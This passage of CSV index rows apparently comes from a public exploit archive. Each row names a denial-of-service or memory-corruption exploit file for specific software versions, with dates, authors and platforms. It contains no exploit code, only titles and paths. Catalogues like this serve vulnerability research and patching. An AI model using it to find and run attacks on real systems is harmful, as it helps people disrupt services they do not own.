Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,dos,multiple, +31232,exploits/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow",2008-02-16,"Luigi Auriemma",dos,multiple, +40356,exploits/multiple/dos/40356.txt,"Adobe Flash - Method Calls Use-After-Free",2016-09-08,"Google Security Research",dos,multiple, +31333,exploits/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' - Local Denial of Service",2008-03-04,sipherr,dos,bsd, +31330,exploits/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",dos,windows, +40355,exploits/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Infomation Leak",2016-09-08,"Google Security Research",dos,multiple, +31285,exploits/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",dos,multiple, +31300,exploits/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Remote Format String",2008-02-25,"Luigi Auriemma",dos,windows, +31301,exploits/windows/dos/31301.txt,"Surgemail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",dos,windows, +31302,exploits/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Null Pointer Denial of Service",2008-02-25,"Luigi Auriemma",dos,windows, +31308,exploits/android/dos/31308.html,"Google Android Web Browser - '.BMP' File Integer Overflow",2008-03-04,"Alfredo Ortega",dos,android, +31310,exploits/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow / Denial of Service",2008-02-27,"Luigi Auriemma",dos,windows, +31323,exploits/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password - Remote Denial of Service",2008-03-01,"Maks M",dos,windows, +31327,exploits/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0.57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",dos,multiple, +31338,exploits/windows/dos/31338.txt,"Perforce Server 2007.3 - Multiple Remote Denial of Service Vulnerabilities",2008-03-05,"Luigi Auriemma",dos,windows, +31343,exploits/multiple/dos/31343.txt,"Sun Java Runtime Environment 1.x - Image Parsing Heap Buffer Overflow",2008-03-06,"Chris Evans",dos,multiple, +31360,exploits/windows/dos/31360.txt,"MailEnable 3.13 - IMAP Service Multiple Remote Vulnerabilities",2008-03-07,"Luigi Auriemma",dos,windows, +31361,exploits/windows/dos/31361.txt,"Microsoft Office 2000/2003/2004/XP - File Memory Corruption",2008-03-07,anonymous,dos,windows, +31363,exploits/windows/dos/31363.txt,"Panda Internet Security/AntiVirus+Firewall 2008 - 'CPoint.sys' Memory Corruption",2008-03-08,"Tobias Klein",dos,windows, +31376,exploits/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 - Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",dos,multiple, +31378,exploits/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 - 'Accept-Charset' Null Pointer Denial of Service",2008-03-10,"Luigi Auriemma",dos,multiple, +31381,exploits/windows/dos/31381.txt,"Motorola Timbuktu Pro 8.6.5 - Multiple Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",dos,windows, +31394,exploits/windows/dos/31394.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSuserCGI.exe' Multiple Remote Vulnerabilities",2008-03-12,felix,dos,windows, +31696,exploits/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",dos,windows, +31461,exploits/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",dos,windows, +31399,exploits/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",dos,windows, +31403,exploits/unix/dos/31403.txt,"Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",dos,unix, +31429,exploits/multiple/dos/31429.py,"VideoLAN VLC Media Player 2.1.2 - '.asf' Crash (PoC)",2014-02-05,Saif,dos,multiple, +31440,exploits/linux/dos/31440.txt,"Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",dos,linux, +31444,exploits/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial of Service",2007-12-05,"Masaaki HIROSE",dos,linux, +31478,exploits/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling - Denial of Service",2008-03-24,sipherr,dos,hardware, +31522,exploits/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",dos,windows,80 +31542,exploits/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - Format String / Denial of Service",2008-03-26,"Luigi Auriemma",dos,multiple, +31984,exploits/linux/dos/31984.txt,"Mozilla Firefox 3.0 - '.JPEG' File Denial of Service",2008-06-27,"Beenu Arora",dos,linux, +31550,exploits/bsd/dos/31550.c,"BSD (Multiple Distributions) - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",dos,bsd, +31552,exploits/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Denial of Service",2008-03-28,"Peter Makrai",dos,linux, +31553,exploits/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Denial of Service",2008-03-28,"Peter Makrai",dos,linux, +31554,exploits/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Denial of Service",2008-03-28,"Peter Makrai",dos,linux, +31563,exploits/windows/dos/31563.txt,"SLmail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",dos,windows, +31585,exploits/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)",2008-04-08,Whitecell,dos,windows, +31592,exploits/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service",2008-04-02,"The Hacker Webzine",dos,windows, +31593,exploits/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection",2008-04-02,"The Hacker Webzine",dos,windows, +31594,exploits/linux/dos/31594.html,"Opera Web Browser 9.26 - Multiple Vulnerabilities",2008-04-03,"Michal Zalewski",dos,linux, +31607,exploits/windows/dos/31607.py,"SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial of Service",2008-04-04,ryujin,dos,windows, +31615,exploits/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial of Service",2014-02-12,"Trustwave's SpiderLabs",dos,multiple, +31619,exploits/osx/dos/31619.ics,"Apple iCal 3.0.1 - 'TRIGGER' Denial of Service",2008-04-21,"Rodrigo Carvalho",dos,osx, +31620,exploits/osx/dos/31620.ics,"Apple iCal 3.0.1 - 'ATTACH' Denial of Service",2008-04-21,"Core Security Technologies",dos,osx, +31627,exploits/unix/dos/31627.c,"LICQ 1.3.5 - File Descriptor Remote Denial of Service",2008-04-08,"Milen Rangelov",dos,unix, +31629,exploits/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x - 'ovspmd' Buffer Overflow",2008-04-08,"Luigi Auriemma",dos,windows, +31635,exploits/windows/dos/31635.py,"WinWebMail 3.7.3 - IMAP Login Data Handling Denial of Service",2008-04-10,ryujin,dos,windows, +31656,exploits/windows/dos/31656.txt,"ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow",2008-04-16,"Leon Juranic",dos,windows, +31707,exploits/windows/dos/31707.txt,"Computer Associates ARCserve Backup Discovery Service Remote - Denial of Service",2008-04-24,"Luigi Auriemma",dos,windows, +31710,exploits/novell/dos/31710.txt,"Novell Groupwise 7.0 - HTML Injection / Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",dos,novell, +31711,exploits/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",dos,windows, +40825,exploits/windows/dos/40825.py,"Remote Utilities Host 6.3 - Denial of Service",2016-11-24,"Peter Baris",dos,windows, +31713,exploits/linux/dos/31713.py,"PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",dos,linux, +31728,exploits/multiple/dos/31728.txt,"Call of Duty 4 1.5 - 'stats' Denial of Service",2008-05-02,"Luigi Auriemma",dos,multiple, +31748,exploits/windows/dos/31748.txt,"Yahoo! Assistant 3.6 - 'yNotifier.dll' ActiveX Control Memory Corruption",2008-05-06,Sowhat,dos,windows, +31761,exploits/linux/dos/31761.txt,"Embedthis Goahead WebServer 3.1.3-0 - Multiple Vulnerabilities",2014-02-19,"Maksymilian Motyl",dos,linux,80 +31762,exploits/windows/dos/31762.py,"Catia V5-6R2013 - 'CATV5_AllApplications' Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",dos,windows,55555 +31763,exploits/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",dos,windows,30000 +31785,exploits/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service",2008-05-13,"Tyler Reguly",dos,multiple, +31791,exploits/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",dos,windows,55555 +40849,exploits/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,sm,dos,windows, +31815,exploits/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",dos,linux, +31817,exploits/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,dos,multiple, +31818,exploits/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",dos,windows, +31819,exploits/windows/dos/31819.pl,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)",2008-05-21,"Praveen Darshanam",dos,windows, +31856,exploits/windows/dos/31856.html,"CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite",2008-05-28,Nine:Situations:Group,dos,windows, +31872,exploits/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow",2008-06-04,"Alfredo Ortega",dos,multiple, +31876,exploits/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll StartApp' ActiveX Control Insecure Method",2008-06-03,"Dennis Rand",dos,windows, +31877,exploits/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",dos,windows, +31878,exploits/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",dos,windows, +31879,exploits/windows/dos/31879.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete",2008-06-03,"Dennis Rand",dos,windows, +31884,exploits/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service",2008-06-05,dubingyao,dos,hardware, +31889,exploits/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 Client - Buffer Overflow",2008-07-02,"Francisco Amato",dos,novell, +31899,exploits/windows/dos/31899.txt,"VideoLAN VLC Media Player 2.1.3 - '.avs' Crash (PoC)",2014-02-25,kw4,dos,windows, +31914,exploits/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)",2014-02-26,"Gabor Seljan",dos,windows, +31915,exploits/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",dos,linux,80 +31919,exploits/multiple/dos/31919.c,"S.T.A.L.K.E.R. 1.0.06 - Remote Denial of Service",2008-06-15,"Luigi Auriemma",dos,multiple, +31931,exploits/multiple/dos/31931.txt,"Crysis 1.21 - HTTP/XML-RPC Service Remote Denial of Service",2008-06-16,"Luigi Auriemma",dos,multiple, +31932,exploits/multiple/dos/31932.txt,"Skulltag 0.97 d2-RC3 - Malformed Packet Denial of Service",2008-06-16,"Luigi Auriemma",dos,multiple, +31934,exploits/windows/dos/31934.txt,"Microsoft Word 2000/2002 - Bulleted List Handling Remote Memory Corruption",2008-06-17,"Ivan Sanchez",dos,windows, +31957,exploits/multiple/dos/31957.txt,"World in Conflict 1.008 - Null Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",dos,multiple, +31958,exploits/multiple/dos/31958.txt,"SunAge 1.8.1 - Multiple Denial of Service Vulnerabilities",2008-06-23,"Luigi Auriemma",dos,multiple, +31964,exploits/windows/dos/31964.txt,"5th street - 'dx8render.dll' Format String",2008-06-25,superkhung,dos,windows, +31965,exploits/linux/dos/31965.c,"Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",dos,linux, +31966,exploits/linux/dos/31966.c,"Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",dos,linux, +31968,exploits/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - '.Playlist' File Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",dos,linux, +32095,exploits/linux/dos/32095.pl,"Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service",2008-07-21,"Blake Cornell",dos,linux, +31979,exploits/linux/dos/31979.html,"GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",dos,linux, +31998,exploits/multiple/dos/31998.txt,"S.T.A.L.K.E.R Shadow of Chernobyl 1.0006 - Multiple Remote Vulnerabilities",2008-06-28,"Luigi Auriemma",dos,multiple, +31999,exploits/multiple/dos/31999.txt,"IBM Tivoli Directory Server 6.1.x - Adding 'ibm-globalAdminGroup' Entry Denial of Service",2008-06-30,anonymous,dos,multiple, +32000,exploits/linux/dos/32000.txt,"OpenLDAP 2.3.41 - BER Decoding Remote Denial of Service",2008-06-30,"Cameron Hotchkies",dos,linux, +32006,exploits/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple Denial of Service Vulnerabilities",2008-06-30,"Noam Rathus",dos,multiple, +32009,exploits/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow",2008-07-01,"Filipe Balestra",dos,unix, +32018,exploits/linux/dos/32018.txt,"Firefox / Evince / EoG / GIMP - '.SVG' File Processing Denial of Service",2008-07-08,"Kristian Hermansen",dos,linux, +32019,exploits/linux/dos/32019.txt,"FFmpeg libavformat - 'psxstr.c' STR Data Heap Based Buffer Overflow",2008-07-09,astrange,dos,linux, +32054,exploits/windows/dos/32054.py,"MediaMonkey 3.0.3 - URI Handling Multiple Denial of Service Vulnerabilities",2008-07-16,Shinnok,dos,windows, +32056,exploits/windows/dos/32056.py,"BitComet 1.02 - URI Handling Remote Denial of Service",2008-07-16,Shinnok,dos,windows, +32086,exploits/multiple/dos/32086.c,"SWAT 4 - Multiple Denial of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",dos,multiple, +32104,exploits/multiple/dos/32104.txt,"ZDaemon 1.8 - Null Pointer Remote Denial of Service",2008-07-21,"Luigi Auriemma",dos,multiple, +32105,exploits/windows/dos/32105.pl,"PowerDVD 8.0 - '.m3u' / '.pls' Multiple Buffer Overflow Vulnerabilities",2008-07-22,LiquidWorm,dos,windows, +32112,exploits/linux/dos/32112.txt,"Minix 3.1.2a - Psuedo Terminal Denial of Service",2008-07-23,kokanin,dos,linux, +32125,exploits/multiple/dos/32125.txt,"Unreal Tournament 2004 - Null Pointer Remote Denial of Service",2008-07-30,"Luigi Auriemma",dos,multiple, +32127,exploits/multiple/dos/32127.txt,"Unreal Tournament 3 - Memory Corruption (Denial of Service)",2008-07-30,"Luigi Auriemma",dos,multiple, +32136,exploits/osx/dos/32136.html,"Apple Mac OSX 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",dos,osx, +32192,exploits/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",dos,multiple, +32193,exploits/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",dos,multiple, +32194,exploits/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,dos,multiple, +32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,dos,multiple, +32208,exploits/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",dos,multiple, +32222,exploits/multiple/dos/32222.rb,"Ruby 1.9 - 'WEBrick::HTTP::DefaultFileHandler' Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",dos,multiple, +32229,exploits/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,dos,windows, +32248,exploits/linux/dos/32248.txt,"Yelp 2.23.1 - Invalid URI Format String",2008-08-13,"Aaron Grattafiori",dos,linux, +32256,exploits/windows/dos/32256.py,"Ipswitch WS_FTP Home/Professional 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,dos,windows, +32332,exploits/windows/dos/32332.txt,"Free Download Manager - Stack Based Buffer Overflow",2014-03-17,"Julien Ahrens",dos,windows,80 +32292,exploits/linux/dos/32292.rb,"Ruby 1.9 - REXML Remote Denial of Service",2008-08-23,"Luka Treiber",dos,linux, +32294,exploits/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 - ActiveX Control Remote Buffer Overflow",2008-08-22,"Jeremy Brown",dos,windows, +32304,exploits/linux/dos/32304.txt,"RedHat 8/9 - Directory Server Crafted Search Pattern Denial of Service",2008-08-27,"Ulf Weltman",dos,linux, +32305,exploits/hardware/dos/32305.txt,"Dreambox - Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",dos,hardware, +32310,exploits/multiple/dos/32310.txt,"Softalk Mail Server 8.5.1 - 'APPEND' Remote Denial of Service",2008-09-02,Antunes,dos,multiple, +32311,exploits/multiple/dos/32311.html,"Google Chrome 0.2.149 - Malformed 'title' Tag Remote Denial of Service",2008-09-02,Exodus,dos,multiple, +32329,exploits/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal (SEH) (Metasploit)",2014-03-17,"Revin Hadi Saputra",dos,windows, +32333,exploits/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",dos,ios, +32335,exploits/multiple/dos/32335.js,"Google Chrome 0.2.149 - Malformed 'view-source' HTTP Header Remote Denial of Service",2008-09-05,"Juan Pablo Lopez Yacubian",dos,multiple, +32341,exploits/hardware/dos/32341.html,"Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Remote Denial of Service",2008-09-12,"Nicolas Economou",dos,hardware, +32348,exploits/linux/dos/32348.txt,"MySQL 6.0.4 - Empty Binary String Literal Remote Denial of Service",2008-03-28,"Kay Roepke",dos,linux, +32350,exploits/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder Null Pointer Dereference Denial of Service",2008-09-09,"Mario Ballano Bárcena",dos,windows, +32356,exploits/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow",2008-09-11,"Juan Pablo Lopez Yacubian",dos,windows, +32362,exploits/multiple/dos/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service",2008-09-12,"Luigi Auriemma",dos,multiple, +32381,exploits/multiple/dos/32381.js,"Avant Browser 11.7 Build 9 - JavaScript Engine Integer Overflow",2008-09-12,0x90,dos,multiple, +32384,exploits/linux/dos/32384.txt,"Linux Kernel 2.6.x - 'add_to_page_cache_lru()' Local Denial of Service",2007-07-20,"Jens Axboe",dos,linux, +32386,exploits/multiple/dos/32386.txt,"Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service",2008-09-16,"Luigi Auriemma",dos,multiple, +32420,exploits/windows/dos/32420.c,"Mass Downloader - Malformed Executable Denial of Service",2008-09-25,Ciph3r,dos,windows, +32428,exploits/windows/dos/32428.txt,"ZoneAlarm 8.0.20 - HTTP Proxy Remote Denial of Service",2008-09-26,quakerdoomer,dos,windows, +32435,exploits/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow (PoC)",2014-03-22,"Veysel HATAS",dos,windows, +32451,exploits/linux/dos/32451.txt,"Linux Kernel (Fedora 8/9) - 'utrace_control' Null Pointer Dereference Denial of Service",2008-10-02,"Michael Simms",dos,linux, +32452,exploits/linux/dos/32452.txt,"Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service",2008-10-02,"Matthew Dempsky",dos,linux, +32454,exploits/unix/dos/32454.xml,"libxml2 - Denial of Service",2008-10-02,"Christian Weiske",dos,unix, +32471,exploits/linux/dos/32471.txt,"KDE Konqueror 3.5.9 - JavaScript 'load' Denial of Service",2008-10-10,"Jeremy Brown",dos,linux, +32472,exploits/hardware/dos/32472.txt,"Nokia Web Browser for S60 - Infinite Array Sort Denial of Service",2008-10-10,"Luca Carettoni",dos,hardware, +32477,exploits/windows/dos/32477.py,"Microsoft Windows Media Player 11.0.5721.5230 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",dos,windows, +32478,exploits/windows/dos/32478.py,"jetVideo 8.1.1 - Basic '.wav' Local Crash (PoC)",2014-03-24,"TUNISIAN CYBER",dos,windows, +32481,exploits/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",dos,windows, +32482,exploits/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",dos,windows, +32483,exploits/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - '.wav' Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",dos,windows, +32519,exploits/multiple/dos/32519.txt,"Couchdb 1.5.0 - 'uuids' Denial of Service",2014-03-26,"Krusty Hack",dos,multiple, +32513,exploits/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",dos,windows, +32514,exploits/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - '.m3u' / '.pls '/ '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",dos,windows, +32522,exploits/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,dos,windows, +32534,exploits/unix/dos/32534.py,"Python 2.5.2 - 'Imageop' Module Argument Validation Buffer Overflow",2008-10-27,"Chris Evans",dos,unix, +32550,exploits/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,dos,windows, +32551,exploits/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,dos,linux, +32573,exploits/windows/dos/32573.txt,"Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,dos,windows, +32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple, +32583,exploits/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,dos,hardware, +32587,exploits/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,dos,windows, +32596,exploits/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial of Service",2008-11-20,"Christian Hoffmann",dos,multiple, +32657,exploits/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service",2008-12-12,NCNIPC,dos,windows, +32763,exploits/windows/dos/32763.html,"Microsoft Internet Explorer 7 - HTML Form Value Denial of Service",2009-01-28,"Juan Pablo Lopez Yacubian",dos,windows, +40993,exploits/android/dos/40993.txt,"Google Android max86902 Driver - 'sysfs' Interfaces Race Condition",2017-01-06,"Google Security Research",dos,android, +32675,exploits/linux/dos/32675.py,"QEMU 0.9 / KVM 36/79 - VNC Server Remote Denial of Service",2008-12-22,"Alfredo Ortega",dos,linux, +32682,exploits/linux/dos/32682.c,"Linux Kernel 2.6.x - 'qdisc_run()' Local Denial of Service",2008-12-23,"Herbert Xu",dos,linux, +32688,exploits/windows/dos/32688.py,"Winace 2.2 - Malformed Filename Remote Denial of Service",2008-12-29,cN4phux,dos,windows, +32692,exploits/hardware/dos/32692.txt,"Symbian S60 - Malformed SMS/MMS Remote Denial of Service",2008-12-30,"Tobias Engel",dos,hardware, +32694,exploits/osx/dos/32694.pl,"Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)",2009-01-01,"Jeremy Brown",dos,osx, +32695,exploits/osx/dos/32695.php,"Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (2)",2009-01-01,Pr0T3cT10n,dos,osx, +32696,exploits/linux/dos/32696.txt,"KDE Konqueror 4.1 - Multiple Cross-Site Scripting / Denial of Service Vulnerabilities",2009-01-02,athos,dos,linux, +32697,exploits/linux/dos/32697.pl,"aMSN - '.ctt' Remote Denial of Service",2009-01-03,Hakxer,dos,linux, +32702,exploits/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2 (build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",dos,hardware,80 +32704,exploits/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service",2014-04-05,LiquidWorm,dos,windows, +32706,exploits/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,dos,windows, +32707,exploits/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption (Denial of Service)",2014-04-06,sajith,dos,windows, +32712,exploits/multiple/dos/32712.txt,"IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial of Service",2009-01-08,Erik,dos,multiple, +32715,exploits/php/dos/32715.php,"PHP 5.2.8 - 'popen()' Function Buffer Overflow",2009-01-12,e.wiZz!,dos,php, +32726,exploits/linux/dos/32726.txt,"Ganglia gmetad 3.0.6 - 'process_path()' Remote Stack Buffer Overflow",2009-01-15,"Spike Spiegel",dos,linux, +32740,exploits/linux/dos/32740.txt,"QNX RTOS 6.4 - '.ELF' Binary File Local Denial of Service",2009-01-19,kokanin,dos,linux, +32749,exploits/linux/dos/32749.txt,"Pidgin 2.4.2 - 'msn_slplink_process_msg()' Denial of Service",2009-01-26,"Juan Pablo Lopez Yacubian",dos,linux, +32754,exploits/osx/dos/32754.c,"Apple Mac OSX 10.9 - Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",dos,osx, +32755,exploits/windows/dos/32755.c,"WFTPD Pro 3.30 - Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,dos,windows, +32761,exploits/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 - URI Remote Denial of Service",2009-01-27,Lostmon,dos,windows, +32769,exploits/php/dos/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial of Service",2009-01-30,strategma,dos,php, +32772,exploits/windows/dos/32772.py,"Nokia MultiMedia Player 1.1 - '.m3u' Heap Buffer Overflow",2009-02-03,zer0in,dos,windows, +32774,exploits/multiple/dos/32774.txt,"QIP 2005 - Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,dos,multiple, +32775,exploits/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",dos,linux, +32800,exploits/linux/dos/32800.txt,"Poppler 0.10.3 - Denial of Service",2009-02-12,Romario,dos,linux, +32815,exploits/linux/dos/32815.c,"Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation",2009-02-25,"Chris Evans",dos,linux, +32817,exploits/osx/dos/32817.txt,"Apple Safari 4 - 'feeds:' URI Null Pointer Dereference Remote Denial of Service",2009-02-25,Trancer,dos,osx, +32824,exploits/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",dos,windows, +32836,exploits/multiple/dos/32836.html,"Mozilla Firefox 2.0.x - Nested 'window.print()' Denial of Service",2009-03-03,b3hz4d,dos,multiple, +32838,exploits/linux/dos/32838.txt,"MySQL 6.0.9 - XPath Expression Remote Denial of Service",2009-02-14,"Shane Bester",dos,linux, +32849,exploits/linux/dos/32849.txt,"PostgreSQL 8.3.6 - Conversion Encoding Remote Denial of Service",2009-03-11,"Afonin Denis",dos,linux, 